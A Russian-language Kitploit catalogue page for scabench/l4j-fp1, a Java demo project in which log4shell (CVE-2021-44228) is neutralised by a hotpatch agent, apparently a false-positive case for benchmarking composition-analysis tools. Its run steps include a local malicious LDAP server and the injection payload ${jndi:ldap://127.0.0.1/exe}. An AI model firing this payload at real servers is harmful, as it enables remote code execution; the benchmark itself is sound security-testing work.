Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
l4j-fp1 — jee веб-проект с обезвреженной уязвимостью log4shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/scabench/l4j-fp1
Анализ уязвимостейАнализ КодаЭксплуатацияВеб-безопасностьБезопасность Цепочки ПоставокОбучение и Образование
GitHubscabench/l4j-fp1

l4j-fp1

jee веб-проект с обезвреженной уязвимостью log4shell (CVE-2021-44228)

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Ложное срабатывание log4shell

Это простой веб-проект с санитизированной уязвимостью log4shell. Несанитизированную версию см. на https://github.com/scabench/l4j-tp1/. Проект определяет простой сервис scabench.HelloWorldService, возвращающий простую текстовую строку hello world. Сервис не ожидает параметров, и если параметры встречаются, в журнал записывается ошибка.

Уязвимая зависимость — org.apache.logging.log4j:log4j-core:2.14.1, уязвимость — CVE-2021-44228.

Санитизация

Проект использует агент, созданный Amazon, когда появился log4shell, а исправления ещё не было. Агент отключает уязвимый класс org.apache.logging.log4j.core.lookup.JndiLookup.

Использование агента обеспечивается путём динамической установки (иначе говоря, подключения) агента при загрузке scabench.HelloWorldService (в статическом блоке класса), в случае сбоя приложение завершается с ошибкой. Для этого требуется, чтобы JVM разрешала самостоятельное подключение агента.

Запуск приложения

  1. включите самостоятельное подключение агента JVM: export MAVEN_OPTS="-Djdk.attach.allowAttachSelf=true"
  2. запустите встроенный веб-сервер: mvn jetty:run
  3. запустите включённый LDAP-сервер: java -jar dodgy-ldap-server.jar (уязвимый код будет загружать Java-код с этого сервера)
  4. откройте в браузере http://localhost:8080/ — на этом сайте есть предварительно заполненная форма с вредоносной полезной нагрузкой ${jndi:ldap://127.0.0.1/exe}
  5. отправьте эту форму
  6. при этом файл foo на сервере НЕ создастся (в отличие от несанитизированной версии)

Обратите внимание: при запуске приложения на консоли появляется следующая строка:

Transforming org/apache/logging/log4j/core/lookup/JndiLookup .

Демонстрация санитизации с помощью теста

Для этого требуются Unix или macOS. Этот проект легко портировать на Windows. Для демонстрации уязвимости предоставлен модульный тест; настройка такая же, как в https://github.com/scabench/l4j-tp1/. Из-за санитизации тест теперь проваливается.

Запуск анализа состава программного обеспечения

Имеется несколько sh-скриптов для запуска различных анализов; отчёты о результатах можно найти в scan-results.

Формирование SBOM

В pom.xml есть плагин для формирования SBOM в формате CycloneDX. Для этого выполните mvn cyclonedx:makePackageBom; SBOM можно найти в target/ в форматах json и xml.

Скачать инструмент